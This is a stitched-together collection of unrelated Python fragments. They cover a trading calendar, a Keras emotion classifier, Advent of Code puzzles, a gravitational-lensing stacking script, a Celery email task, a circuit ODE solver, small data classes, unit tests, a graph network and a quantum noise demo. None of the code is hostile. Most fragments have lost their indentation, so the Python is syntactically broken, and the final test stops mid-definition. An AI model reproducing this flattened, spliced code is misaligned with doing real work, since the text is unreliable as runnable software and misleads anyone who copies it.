if proto_observance == cpb.Observance.NEAREST_WORKDAY:
return holiday.nearest_workday
elif proto_observance == cpb.Observance.SUNDAY_TO_MONDAY:
return holiday.sunday_to_monday
else:
return
def close_times(self):
pass
def open_times(self):
pass
def name(self):
return self._proto_calendar.name
def tz(self):
return self._proto_calendar.timezone
def open_time(self):
return self._from_proto_time(self._proto_calendar.open_time)
def close_time(self):
return self._from_proto_time(self._proto_calendar.close_time)
def regular_holidays(self):
return tc.HolidayCalendar(
[self._from_proto_holiday(hol) for hol in self._proto_calendar.regular_holidays]
)
def adhoc_holidays(self):
return list(
it.chain(
*[pd.date_range(
cvr.to_datetime(r.start_date),
cvr.to_datetime(r.end_date))
for r in self._proto_calendar.adhoc_holidays])
)
def special_closes(self):
return [
(sp.time,
tc.HolidayCalendar(
[self._from_proto_holiday(hol)
for hol in sp.holidays]))
for sp in self._proto_calendar.special_closes]
def special_closes_adhoc(self):
return [
(sp.time,
[cvr.to_datetime(t).strftime("%Y-%m-%d")
for t in sp.dates])
for sp in self._proto_calendar.special_closes_adhoc]
def from_proto_calendar(proto_calendar, start, end=None, cache=False):
if end is None:
end = start + pd.Timedelta(days=365)
#todo: cache the calendar
return TradingCalendar(start, end, proto_calendar)
def to_proto_calendar(calendar):
#todo
    pass
|
"""A package for already-implemented machine learning Siamese architectures.
"""
from dualing.models.contrastive import ContrastiveSiamese
from dualing.models.cross_entropy import CrossEntropySiamese
from dualing.models.triplet import TripletSiamese
|
from random import randrange
#
from UnionFind_QuickFind import UnionFind
test_size = 12
uf = UnionFind( test_size )
uf.enumerate()
while 1 < uf.g :
uf.union( randrange( test_size ), randrange( test_size ) )
uf.enumerate()
|
from keras.utils.np_utils import to_categorical
import os
import cv2
import numpy as np
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import *
dataPath = './dataset'
data_dir_list = os.listdir(dataPath)
# ['happiness', 'sadness', 'neutral', 'anger']
print(data_dir_list)
imgDataList = []
for dataset in data_dir_list:
img_list = os.listdir(dataPath+'/' + dataset)
print('Loaded the images of dataset-'+'{}\n'.format(dataset))
    # print(img_list)  # the full image data for this class
for img in img_list:
inputImg = cv2.imread(dataPath + '/' + dataset + '/' + img)
inputImgResize = cv2.resize(inputImg, (48, 48))
        # the photos are already 48x48; resizing just to be sure
imgDataList.append(inputImgResize)
imgData = np.array(imgDataList)
imgData = imgData.astype('float32')
imgData = imgData/255 # Normalization
num_classes = 4
# the number of image samples: imgData.shape is (samples, height, width, channels), so we take index 0
num_of_samples = imgData.shape[0]
print(num_of_samples)
# create an array of ones to hold the labels
labels = np.ones((num_of_samples), dtype='int64')
# print(labels)
labels[0:421] = 0     # 421 happiness
labels[421:741] = 1   # 320 sadness
labels[741:1056] = 2  # 315 neutral
labels[1056:1272] = 3 # 216 anger
# print(labels)
Y = to_categorical(labels, num_classes)
# Since this is multi-class classification, the labels must be encoded categorically.
# The integer labels are encoded into another format:
# 0 => [1,0,0,0,0,0,0,0,0,0]
# 2 => [0,0,1,0,0,0,0,0,0,0]
# 9 => [0,0,0,0,0,0,0,0,0,1]
# This encoding is known as one-hot encoding.
# print(Y)
# Shuffle the dataset
x, y = shuffle(imgData, Y, random_state=2)
# Shuffling permutes the indices within the arrays: the images in imgData are randomly reordered into x.
# The rows of Y are reordered the same way into y.
# print(x)
# print(y)
# Split the dataset
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size=0.05, random_state=2)
# A portion of x is held out as a test set and used for validation in the application.
# test_size here means: split the dataset into 95% train and 5% validation.
# random_state makes the split deterministic and reproducible.
input_shape = (48, 48, 3)
# The PNG data is used directly, so there are 3 channels. (In digitRecognition it was 1, because that data came from a CSV rather than PNG files.)
model = Sequential()  # create the model
# 1
model.add(Conv2D(filters=6, kernel_size=(5, 5),
input_shape=input_shape, padding='Same', activation='relu'))
# filters = number of filters in the convolution layer
# kernel_size = size of each filter
# Same padding is used (zero-padding the borders so that input size == output size).
# Activation function: relu
model.add(MaxPooling2D(pool_size=(2, 2)))
# 2
model.add(Conv2D(filters=16, kernel_size=(5, 5),
padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# 3
model.add(Conv2D(filters=64, kernel_size=(5, 5),
padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# Flatten -> collapses the feature maps into a single column, for the dense (ANN) layers
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4, activation='softmax'))
# Adam Optimizer
# The learning rate is normally fixed; the Adam optimizer lets it adapt during training.
optimizer = Adam(lr=0.001, beta_1=0.9, beta_2=0.999)
# The loss function is categorical_crossentropy: high for a wrong prediction, close to 0 for a correct one.
model.compile(optimizer=optimizer,
loss='categorical_crossentropy', metrics=['accuracy'])
# Fit the model
hist = model.fit(x_train, y_train, batch_size=8, epochs=50, verbose=1,
validation_data=(x_test, y_test))
# Epoch and Batch Size
# The training set is processed in batches of batch_size samples (8 here); one
# full pass over all batches is called an epoch.
# Evaluate model
score = model.evaluate(x_test, y_test)
print('Test accuracy:', score[1])
model.save('main.model')
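# Reloading sketch (path as saved above):
#
#     from keras.models import load_model
#     model = load_model('main.model')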
|
from __future__ import absolute_import
from .suites import NAMED_SUITES
from .loggers import NAMED_LOGGERS
|
from functools import cache
from itertools import product
def parse_data():
with open('2021/21/input.txt') as f:
data = f.read()
return [int(line.rsplit(maxsplit=1)[1]) for line in data.splitlines()]
def part_one(data):
data = data.copy()
scores = [0, 0]
pi = 1
rolls = 0
def roll():
nonlocal rolls
rolls += 1
return (rolls - 1) % 100 + 1
while True:
pi ^= 1
data[pi] += sum(roll() for _ in range(3))
data[pi] = (data[pi] - 1) % 10 + 1
scores[pi] += data[pi]
if scores[pi] >= 1000:
return rolls * scores[pi ^ 1]
def part_two(data):
@cache
def dirac_dice(p1, p2, s1=0, s2=0):
wins = [0, 0]
for rolls in product((1, 2, 3), repeat=3):
new_p1 = (p1 + sum(rolls) - 1) % 10 + 1
new_s1 = s1 + new_p1
if new_s1 >= 21:
wins[0] += 1
else:
dp2, dp1 = dirac_dice(p2, new_p1, s2, new_s1)
wins[0] += dp1
wins[1] += dp2
return wins
return max(dirac_dice(*data.copy()))
def main():
data = parse_data()
print(f'Day 21 Part 01: {part_one(data)}')
print(f'Day 21 Part 02: {part_two(data)}')
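# Entry point (assumed; runs both parts when the script is executed directly):
if __name__ == '__main__':
    main()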
|
class Moon:
def __init__(self, x, y, z):
self.position = [x, y, z]
self.velocity = [0, 0, 0]
def update_velocity(self, other):
for i in range(3):
self.update_velocity_for_axe(other, i)
def update_velocity_for_axe(self, other, axe):
if self.position[axe] < other.position[axe]:
self.velocity[axe] += 1
elif self.position[axe] > other.position[axe]:
self.velocity[axe] -= 1
else:
pass
def move(self):
for i in range(3):
self.move_axe(i)
def move_axe(self, axe):
self.position[axe] += self.velocity[axe]
def get_energy(self):
return sum([abs(i) for i in self.position]) * sum(
[abs(i) for i in self.velocity]
)
def __repr__(self):
return "pos<x=%4d, y=%4d, z=%4d>, vel<x=%4d, y=%4d, z=%4d>" % (
*self.position,
*self.velocity,
)
def __eq__(self, other):
return self.position == other.position and self.velocity == other.velocity
def get_info(self, axe):
return (self.position[axe], self.velocity[axe])
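# One simulation step, sketched with made-up starting positions:
#
#     io, europa = Moon(-1, 0, 2), Moon(2, -10, -7)
#     io.update_velocity(europa); europa.update_velocity(io)
#     io.move(); europa.move()
#     print(io.get_energy(), europa.get_energy())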
|
#!/bin/env python
import fitsio, numpy as np, json
import esutil as eu
from shear_stacking import *
from sys import argv
from multiprocessing import Pool, current_process, cpu_count
from glob import glob
import pylab as plt
def getValues(s, key, functions):
    # what values are used for the slices: derived functions or direct columns?
if key in functions.keys():
return eval(functions[key])
else:
return s[key]
def getSliceMask(values, lower, upper, return_num=False):
if return_num is False:
return (values >= lower) & (values < upper)
else:
return sum((values >= lower) & (values < upper))
def getQuadrantMask(lens, shapes, config):
quad_flags = lens['quad_flags']
# no quadrant pairs OK
if quad_flags <= 1:
return np.array([], dtype='bool')
# all OK
if quad_flags == (2**0 + 2**1 + 2**2 + 2**3 + 2**4):
return np.ones(shapes.size, dtype='bool')
# not all quadrant pairs are OK
# FIXME: needs to be defined from angles on the curved sky
# NOTE: very restrictive due to strict ordering of quadrants
# e.g. if all sources are in the top half, but quad_flags & 2 > 0,
# then no source will be selected even if quad_flags & 8 > 0
if quad_flags & 2 > 0:
return shapes[config['shape_dec_key']] > lens[config['lens_dec_key']]
if quad_flags & 4 > 0:
return shapes[config['shape_ra_key']] < lens[config['lens_ra_key']]
if quad_flags & 8 > 0:
return shapes[config['shape_dec_key']] < lens[config['lens_dec_key']]
if quad_flags & 16 > 0:
return shapes[config['shape_ra_key']] > lens[config['lens_ra_key']]
def createProfile(config):
n_jack = config['n_jack']
l = config['minrange']
u = config['maxrange']
n_bins = config['n_bins']
bin_type = config['bin_type']
if bin_type == "linear":
bins = np.linspace(l, u, n_bins+1)
elif bin_type == "log":
dlogx = (np.log(u) - np.log(l))/n_bins
bins = np.exp(np.log(l) + dlogx * np.arange(n_bins+1))
else:
raise NotImplementedError("bin_type %s not in ['linear', 'log']" % bin_type)
# create profile for all data and for each slice defined
pnames = ['all']
for key, limit in config['splittings'].iteritems():
for s in xrange(len(limit)-1):
pnames.append("%s_%d" % (key, s))
profile = {}
# each slice get a binned profile for all data and each jackknife region
for pname in pnames:
profile[pname] = [BinnedScalarProfile(bins) for i in xrange(n_jack + 1)]
return profile
# BinnedScalarProfile has a += operator, so we just have to call this for
# each slices/jackknifed profile
def appendToProfile(profile, profile_):
for pname in profile.keys():
for i in xrange(len(profile[pname])):
profile[pname][i] += profile_[pname][i]
def insertIntoProfile(profile, pname, R, Q, W, S, region=-1, mask=None):
if mask is None:
for i in xrange(len(profile[pname])):
if i != region:
profile[pname][i].insert(R, Q, W, S=S)
else:
for i in xrange(len(profile[pname])):
if i != region:
if S is not None:
profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S[mask])
else:
profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S)
def getShearValues(shapes_lens, lens, config):
global wz1, wz2
# compute tangential shear
gt = tangentialShear(shapes_lens[config['shape_ra_key']], shapes_lens[config['shape_dec_key']], getValues(shapes_lens, config['shape_e1_key'], config['functions']), getValues(shapes_lens, config['shape_e2_key'], config['functions']), lens[config['lens_ra_key']], lens[config['lens_dec_key']], computeB=False)
# compute DeltaSigma from source redshift
# we use DeltaSigma = wz2 * wz1**-1 < gt> / (wz2 <s>),
# where wz1 and wz2 are the effective inverse Sigma_crit
# weights at given lens z
"""W = getValues(shapes_lens, config['shape_weight_key'], config['functions'])
z_l = getValues(lens, config['lens_z_key'], config['functions'])
z_s = getValues(shapes_lens, config['shape_z_key'], config['functions'])
Sigma_crit = getSigmaCrit(z_l, z_s)
mask = z_s > z_l
gt[mask] *= Sigma_crit[mask]**-1
W[mask] *= Sigma_crit[mask]**-2
W[mask == False] = 0
"""
# compute sensitivity and weights: with the photo-z bins,
# the precomputed wz1 already contains the measurement weights,
# we just need to apply the effective Sigma_crit to gt and
# replace W with wz1**2 (dropping the measurement weight which would otherwise
# be counted twice).
# See Sheldon et al., 2004, AJ, 127, 2544 (eq. 19)
W = np.zeros(gt.size) # better safe than sorry
zs_bin = getValues(shapes_lens, config['shape_z_key'], config['functions'])
for b in np.unique(zs_bin):
wz1_ = extrap(lens[config['lens_z_key']], wz1['z'], wz1['bin%d' % b])
mask = zs_bin == b
gt[mask] /= wz1_
W[mask] = wz1_**2
S = getValues(shapes_lens, config['shape_sensitivity_key'], config['functions'])
return gt, W, S
def stackShapes(shapes, lenses, profile_type, config, regions):
chunk_size = config['shape_chunk_size']
shapefile = config['shape_file']
thread_id = current_process()._identity
basename = os.path.basename(shapefile)
basename = ".".join(basename.split(".")[:-1])
matchfile = '/tmp/' + basename + '_matches_%d.bin' % thread_id
# do we have the column for the quadrant check?
do_quadrant_check = 'quad_flags' in lenses.dtype.names
# find all galaxies in shape catalog within maxrange arcmin
# of each lens center
maxrange = float(config['maxrange'])
if config['coords'] == "physical":
maxrange = Dist2Ang(maxrange, lenses[config['lens_z_key']])
h = eu.htm.HTM(8)
matchfile = matchfile.encode('ascii') # htm.match expects ascii filenames
h.match(lenses[config['lens_ra_key']], lenses[config['lens_dec_key']], shapes[config['shape_ra_key']], shapes[config['shape_dec_key']], maxrange, maxmatch=-1, file=matchfile)
htmf = HTMFile(matchfile)
Nmatch = htmf.n_matches
# profile container
profile = createProfile(config)
if Nmatch:
# iterate over all lenses, write scalar value, r, weight into file
for m1, m2, d12 in htmf.matches():
lens = lenses[m1]
region = regions[m1]
shapes_lens = shapes[m2]
# check which sources around a lens we can use
if do_quadrant_check:
mask = getQuadrantMask(lens, shapes_lens, config)
shapes_lens = shapes_lens[mask]
d12 = np.array(d12)[mask]
del mask
n_gal = shapes_lens.size
if n_gal:
# define the profile quantities: radius, q, weight, sensitivity
if config['coords'] == "physical":
R = Ang2Dist(d12, lens[config['lens_z_key']])
else:
R = np.array(d12)
if profile_type == "scalar":
Q = getValues(shapes_lens, config['shape_scalar_key'], config['functions'])
W = getValues(shapes_lens, config['shape_weight_key'], config['functions'])
S = None
if profile_type == "shear":
Q, W, S = getShearValues(shapes_lens, lens, config)
# save unsliced profile first
insertIntoProfile(profile, 'all', R, Q, W, S, region=region)
# find out in which slice each pair falls
for key, limit in config['splittings'].iteritems():
if config['split_type'] == 'shape':
values = getValues(shapes_lens, key, config['functions'])
for s in xrange(len(limit)-1):
pname = "%s_%d" % (key, s)
mask = getSliceMask(values, limit[s], limit[s+1])
insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask)
del mask
del values
elif config['split_type'] == 'lens':
value = getValues(lens, key, config['functions'])
for s in xrange(len(limit)-1):
pname = "%s_%d" % (key, s)
# each lens can only be in one slice per key
if getSliceMask(value, limit[s], limit[s+1]):
mask = None
insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask)
break
del shapes_lens, R, Q, W, S
# finish up
os.system('rm ' + matchfile)
return profile
def getJackknifeRegions(config, lenses, outdir):
    # if jackknife errors are desired: create jackknife regions from
# the lens file by k-means clustering and assign each lens
# to the nearest k-means center
# If reuse_jack is specified: reload previously generated centers
# to use fixed regions
if config['n_jack']:
n_jack = config['n_jack']
import kmeans_radec
jack_file = outdir + "n_jack/km_centers.npy"
radec = np.dstack((lenses[config['lens_ra_key']], lenses[config['lens_dec_key']]))[0]
if not os.path.exists(jack_file):
print "defining %d jackknife regions" % n_jack
maxiter = 100
tol = 1.0e-5
km = kmeans_radec.kmeans_sample(radec, n_jack, maxiter=maxiter, tol=tol)
if not km.converged:
raise RuntimeError("k means did not converge")
# save result for later
try:
os.makedirs(outdir + "n_jack")
except OSError:
pass
np.save(jack_file, km.centers)
else:
print "reusing jackknife regions from " + jack_file
centers_ = np.load(jack_file)
km = kmeans_radec.KMeans(centers_)
# define regions: ids of lenses assigned to each k-means cluster
regions = km.find_nearest(radec)
else:
# do not use regions: -1 will never be selected for jackknifes
regions = -1 * np.ones(len(lenses), dtype='int8')
return regions
def computeMeanStdForProfile(profile):
n_jack = len(profile)-1
    # use built-in method to calculate in-bin means and dispersions
if n_jack == 0:
mean_r, n, mean_q, std_q, sum_w = profile.getProfile()
mask = (n>0)
return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q[mask], "std_q": std_q[mask], "sum_w": sum_w[mask]}
else: # jackknife
q = []
missing = []
for i in xrange(n_jack):
r_, n_, q_, std_q, sum_w = profile[i].getProfile()
missing.append(n_ == 0)
q.append(q_)
missing = np.array(missing)
q = np.ma.masked_array(q, mask=missing)
mean_q = q.mean(axis=0)
# result for normal/non-jackknife profile
mean_r, n, mean0, std_q, sum_w = profile[-1].getProfile()
mask = (n>0)
# variance and bias-corrected mean needs number of actual jackknifes:
# to be corrected for available data in each radial bin
n_avail = n_jack - missing.sum(axis=0)
mean_q = n_avail*mean0 - (n_avail - 1)*mean_q
std_q = ((n_avail - 1.)/n_avail * ((q - mean_q)**2).sum(axis=0))**0.5
return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q.data[mask], "std_q": std_q.data[mask], "sum_w": sum_w[mask]}
def collapseJackknifes(profile):
for pname in profile.keys():
profile[pname] = computeMeanStdForProfile(profile[pname])
if __name__ == '__main__':
# parse inputs
try:
configfile = argv[1]
profile_type = argv[2]
except IndexError:
print "usage: " + argv[0] + " <config file> <shear/scalar>"
raise SystemExit
try:
fp = open(configfile)
print "opening configfile " + configfile
config = json.load(fp)
fp.close()
except IOError:
print "configfile " + configfile + " does not exist!"
raise SystemExit
if profile_type not in ['shear', 'scalar']:
print "specify profile_type from ['shear', 'scalar']"
raise SystemExit
if config['coords'] not in ['angular', 'physical']:
print "config: specify either 'angular' or 'physical' coordinates"
raise SystemExit
outdir = os.path.dirname(configfile) + "/"
if profile_type == "shear":
name = "shear_"
if profile_type == "scalar":
name = "scalar_" + config['shape_scalar_key'] + "_"
profile_files = outdir + name + '*.npz'
# only do something if there are no profiles present
if len(glob(profile_files)) == 0:
# open shape catalog
shapes_all = getShapeCatalog(config, verbose=True)
if shapes_all.size == 0:
print "Shape catalog empty"
raise SystemExit
# open lens catalog
lenses = getLensCatalog(config, verbose=True)
if lenses.size == 0:
print "Lens catalog empty"
raise SystemExit
# container to hold profiles
profile = createProfile(config)
# get the jackknife regions (if specified in config)
regions = getJackknifeRegions(config, lenses, outdir)
# load lensing weights (w * Sigma_crit ^-1 or -2) for shear profiles
if profile_type == "shear":
wz1 = getWZ(power=1)
    # cut into manageable chunks and distribute over CPUs
print "running lens-source stacking ..."
n_processes = cpu_count()
pool = Pool(processes=n_processes)
chunk_size = config['shape_chunk_size']
splits = len(shapes_all)/chunk_size
if len(shapes_all) % chunk_size != 0:
splits += 1
results = [pool.apply_async(stackShapes, (shapes_all[i*chunk_size: (i+1)*chunk_size], lenses, profile_type, config, regions)) for i in range(splits)]
j = 0
for r in results:
profile_ = r.get()
appendToProfile(profile, profile_)
r, n, mean_q, std_q, sum_w = profile['all'][-1].getProfile()
print " job %d/%d (n_pairs = %.3fe9) done" % (j, splits, n.sum() / 1e9)
j+=1
# save jackknife region results
if config['n_jack']:
print "saving jackknife profiles..."
for pname in profile.keys():
for i in xrange(len(profile[pname])):
filename = outdir + 'n_jack/' + name + pname + '_%d.npz' % i
profile[pname][i].save(filename)
# collapse jackknifes into means and stds
print "aggregating results..."
collapseJackknifes(profile)
# save profiles
for pname in profile.keys():
filename = outdir + name + pname + '.npz'
print "writing " + filename
np.savez(filename, **(profile[pname]))
# print all profile to stdout
p = profile['all']
print "\nALL profile:"
print "{0:>8s} | {1:>12s} | {2:>12s} | {3:>12s} +- {4:>12s}".format("RADIUS", "NUMBER", "SUM(W)/AREA", "MEAN", "STD")
print "-" * 70
for i in xrange(len(p['n'])):
print "{0:8.2f} | {1:12g} | {2:12g} | {3:12g} +- {4:12g}".format(p['mean_r'][i], p['n'][i], p['sum_w'][i], p['mean_q'][i], p['std_q'][i])
else:
print "Profiles " + profile_files + " already exist."
|
from simit_services.celery import app
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
@app.task
def asinc_mail(list_emails=None, subject='NO SUBJECT', template=None, content_data=None):
    # avoid the shared mutable default argument pitfall
    list_emails = list_emails or []
sender = "SIMIT SERVICES <[email protected]>"
merge_data = content_data
text_body = render_to_string("../templates/"+template+".txt", merge_data)
html_body = render_to_string("../templates/"+template+".html", merge_data)
msg = EmailMultiAlternatives(subject=subject, from_email=sender,
to=list_emails, body=text_body)
msg.attach_alternative(html_body, "text/html")
msg.send()
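# A minimal usage sketch (hypothetical recipients and template name; assumes
# welcome.txt and welcome.html resolve under the configured template dirs):
#   asinc_mail.delay(["user@example.com"], subject="Welcome",
#                    template="welcome", content_data={"name": "Ada"})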
|
import numpy
import matplotlib.pyplot as plt
from scipy import integrate
from scipy.interpolate import InterpolatedUnivariateSpline
# one-dimensional piecewise-linear interpolation of a function defined by the points (xp, fp).
# Table1
masI = [0.5, 1, 5, 10, 50, 200, 400, 800, 1200]
masT0 = [6400, 6790, 7150, 7270, 8010, 9185, 10010, 11140, 12010]
masm = [0.4, 0.55, 1.7, 3, 11, 32, 40, 41, 39]
# Table2
masT = [4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 12000, 13000, 14000]
masSigm = [0.031, 0.27, 2.05, 6.06, 12.0,
19.9, 29.6, 41.1, 54.1, 67.7, 81.5]
# x - t, time
# y - I, current
# z - Uc, capacitor voltage
# f - dI/dt
# phi - dU/dt
def interpolate(x, masX, masY):
order = 1
s = InterpolatedUnivariateSpline(masX, masY, k=order)
return float(s(x))
def T(z):
return (Tw - T0) * z**m + T0
def sigma(T):
return interpolate(T, masT, masSigm)
def Rp(I):
global m
global T0
m = interpolate(I, masI, masm)
T0 = interpolate(I, masI, masT0)
def func(z): return sigma(T(z)) * z
integral = integrate.quad(func, 0, 1)
Rp = le/(2 * numpy.pi * R**2 * integral[0])
return Rp
def f(xn, yn, zn):
return -((Rk + m_Rp_global) * yn - zn)/Lk
def phi(xn, yn, zn):
return -yn/Ck
def second_order(xn, yn, zn, hn, m_Rp):
global m_Rp_global
m_Rp_global = m_Rp
alpha = 0.5
yn_1 = yn + hn * ((1 - alpha) * f(xn, yn, zn) + alpha
* f(xn + hn/(2*alpha),
yn + hn/(2*alpha) * f(xn, yn, zn),
zn + hn/(2*alpha) * phi(xn, yn, zn)))
zn_1 = zn + hn * ((1 - alpha) * phi(xn, yn, zn) + alpha
* phi(xn + hn/(2*alpha),
yn + hn/(2*alpha) * f(xn, yn, zn),
zn + hn/(2*alpha) * phi(xn, yn, zn)))
return yn_1, zn_1
def fourth_order(xn, yn, zn, hn, m_Rp):
global m_Rp_global
m_Rp_global = m_Rp
k1 = hn * f(xn, yn, zn)
q1 = hn * phi(xn, yn, zn)
k2 = hn * f(xn + hn/2, yn + k1/2, zn + q1/2)
q2 = hn * phi(xn + hn/2, yn + k1/2, zn + q1/2)
k3 = hn * f(xn + hn/2, yn + k2/2, zn + q2/2)
q3 = hn * phi(xn + hn/2, yn + k2/2, zn + q2/2)
k4 = hn * f(xn + hn, yn + k3, zn + q3)
q4 = hn * phi(xn + hn, yn + k3, zn + q3)
yn_1 = yn + (k1 + 2*k2 + 2*k3 + k4)/6
zn_1 = zn + (q1 + 2*q2 + 2*q3 + q4)/6
return yn_1, zn_1
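# A one-step sanity-check sketch (hypothetical state and a fixed Rp value),
# comparing the two integrators on identical inputs:
#   Rk, Lk, Ck = 0.25, 187e-6, 268e-6  # circuit constants as in __main__
#   y2, z2 = second_order(0.0, 0.5, 1400.0, 1e-5, 1.0)
#   y4, z4 = fourth_order(0.0, 0.5, 1400.0, 1e-5, 1.0)
#   # the two results should agree to O(h^3) for a smooth right-hand side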
def do_plot(pltMasT, mas1, mas2, xlabel, ylabel, name1, name2):
plt.plot(pltMasT, mas1)
plt.plot(pltMasT, mas2)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.legend((name1, name2))
plt.grid(True)
plt.show()
if __name__ == "__main__":
R = 0.35
Tw = 2000.0
Ck = 268e-6
Lk = 187e-6
    Rk = 0.25  # from 0.5 to 200
Uc0 = 1400.0
    I0 = 0.5  # from 0.5 to 3
le = 12.0
I4 = I0
Uc4 = Uc0
I2 = I0
Uc2 = Uc0
T0 = 0.0
m = 0.0
pltMasTzero = []
pltMasT = []
pltMasI4 = []
pltMasU4 = []
pltMasRp4 = []
pltMasI2 = []
pltMasU2 = []
pltMasRp2 = []
h = 1e-5
for t in numpy.arange(0, 0.0006, h):
try:
m_Rp4 = Rp(I4)
m_Rp2 = Rp(I2)
if t > h:
pltMasT.append(t)
pltMasTzero.append(T0)
pltMasI4.append(I4)
pltMasU4.append(Uc4)
pltMasRp4.append(m_Rp4)
pltMasI2.append(I2)
pltMasU2.append(Uc2)
pltMasRp2.append(m_Rp2)
I4, Uc4 = fourth_order(t, I4, Uc4, h, m_Rp4)
I2, Uc2 = second_order(t, I2, Uc2, h, m_Rp2)
        except Exception:
            # stop integrating once Rp or a step fails (e.g. interpolation out of range)
            break
do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'I', '4th order', '2nd order')
do_plot(pltMasT, pltMasU4, pltMasU2, 't', 'Uc', '4th order', '2nd order')
do_plot(pltMasT, pltMasRp4, pltMasRp2, 't', 'Rp', '4th order', '2nd order')
for i in range(len(pltMasI4)):
pltMasI4[i] *= pltMasRp4[i]
pltMasI2[i] *= pltMasRp2[i]
do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'Up', '4th order', '2nd order')
do_plot(pltMasTzero, pltMasI4, pltMasI2, 't', 'T0', '4th order', '2nd order')
|
class DataRow(dict):
"""object for holding row of data"""
def __init__(self, *args, **kwargs):
"""creates instance of DataRow"""
super(DataRow, self).__init__(*args, **kwargs)
self.target_table = None
def row_values(self, field_names, default_value=None):
"""returns row value of specified field_names"""
return tuple(self.get(field_name, default_value) for field_name in field_names)
def set_target_table(self, target_table):
"""sets target table attribute"""
self.target_table = target_table
def get_target_table(self):
"""returns target table attribute"""
return self.target_table
class DataTable(object):
"""object for holding data"""
def __init__(self, data, keys=None):
"""instantiates Table object with rows(which should be a list of dictionaries)"""
self.rows = list(data)
#set keys as _keys of first row by default
if keys:
self._keys = keys
else:
self._keys = list(self.rows[0].keys())
def keys(self):
"""returns keys of Table"""
return self._keys
def append_row(self, row):
"""adds another row to table"""
self.rows.append(row)
def iterrows(self, field_names, default_value=None):
"""generator that yields specified fields for each row"""
for row in self.rows:
yield tuple(row.get(field_name, default_value) for field_name in field_names)
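# A minimal usage sketch (hypothetical rows):
#   table = DataTable([{"id": 1, "name": "a"}, {"id": 2}])
#   table.append_row(DataRow({"id": 3, "name": "c"}))
#   for id_, name in table.iterrows(("id", "name"), default_value=""):
#       print(id_, name)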
|
import unittest
from daps.utils.video import count_frames, duration, frame_rate
class test_video(unittest.TestCase):
def setUp(self):
self.video = 'data/videos/example.mp4'
self.video_dir = 'data/videos/example'
def test_count_frames(self):
filename = 'not_existent_video.avi'
assert count_frames(filename) == 0
assert count_frames(self.video_dir, method='dir') == 1507
assert count_frames(self.video) == 1507
assert count_frames(self.video, 'ffprobe') == 1507
@unittest.skip("A contribution is required")
def test_dump_frames(self):
pass
def test_duration(self):
assert isinstance(duration(self.video), float)
assert duration('nonexistent.video') == 0.0
@unittest.skip("A contribution is required")
    def test_get_clip(self):  # test_-prefixed so the runner collects and reports the skip
pass
def test_frame_rate(self):
assert isinstance(frame_rate(self.video), float)
assert frame_rate('nonexistent.video') == 0.0
|
import numpy
print("Hello World 4") |
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam
from torch_geometric.nn import GCNConv
from datasets import get_planetoid_dataset
class GCN(nn.Module):
def __init__(self, dataset, nhid, dropout):
super(GCN, self).__init__()
self.gc1 = GCNConv(dataset.num_features, nhid)
self.gc2 = GCNConv(nhid, dataset.num_classes)
self.dropout = dropout
def reset_parameters(self):
self.gc1.reset_parameters()
self.gc2.reset_parameters()
def forward(self, data):
x, edge_index = data.x, data.edge_index
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.gc1(x, edge_index)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.gc2(x, edge_index)
return F.log_softmax(x, dim=1)
def create_gcn_model(data_name, nhid=16, dropout=0.5,
lr=0.01, weight_decay=5e-4):
dataset = get_planetoid_dataset(data_name, True)
model = GCN(dataset, nhid, dropout)
optimizer = Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
return dataset, model, optimizer
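# A minimal usage sketch (assuming a Planetoid dataset name such as "Cora"):
#   dataset, model, optimizer = create_gcn_model("Cora")
#   log_probs = model(dataset[0])  # shape: [num_nodes, num_classes]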
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from traitlets import Bool, Tuple, List
from .utils import setup, teardown
from ..widget import Widget
# A widget with simple traits
class SimpleWidget(Widget):
a = Bool().tag(sync=True)
b = Tuple(Bool(), Bool(), Bool(), default_value=(False, False, False)).tag(sync=True)
c = List(Bool()).tag(sync=True)
def test_empty_send_state():
w = SimpleWidget()
w.send_state([])
assert w.comm.messages == []
def test_empty_hold_sync():
w = SimpleWidget()
with w.hold_sync():
pass
assert w.comm.messages == []
|
"""
probabilistic bit flip noise
"""
from qulacs import Observable
from qulacs import QuantumState, QuantumCircuit
from qulacs.gate import Probabilistic, X
import matplotlib.pyplot as plt
obs = Observable(1)
obs.add_operator(1, "Z 0")
state = QuantumState(1)
circuit = QuantumCircuit(1)
p = 0.1 # probability of bit flip
n_circuit_sample = 10000
n_depth = 20 # number of applications of the probabilistic gate
probabilistic_pauli_gate = Probabilistic([p],[X(0)]) #define probabilistic gate
circuit.add_gate(probabilistic_pauli_gate) # add the prob. gate to the circuit
exp_array = []
for depth in range(n_depth):
exp = 0
    for _ in range(n_circuit_sample):
state.set_zero_state()
for _ in range(depth):
circuit.update_quantum_state(state) # apply the prob. gate
exp += obs.get_expectation_value(state) # get expectation value for one sample of circuit
exp /= n_circuit_sample # get overall average
exp_array.append(exp)
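# For reference, the expectation decays analytically as <Z> = (1 - 2p)**depth
# for this bit-flip channel, so the sampled curve can be checked against:
#   analytic = [(1 - 2 * p) ** d for d in range(n_depth)]
#   plt.plot(range(n_depth), analytic)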
#plot
plt.plot(range(n_depth), exp_array)
plt.show() |
import unittest
from BaseTest import BaseTest
class Test_goService(BaseTest):
GO_SERVICE_URL = "http://localhost:3000/health"
def test_goService(self):
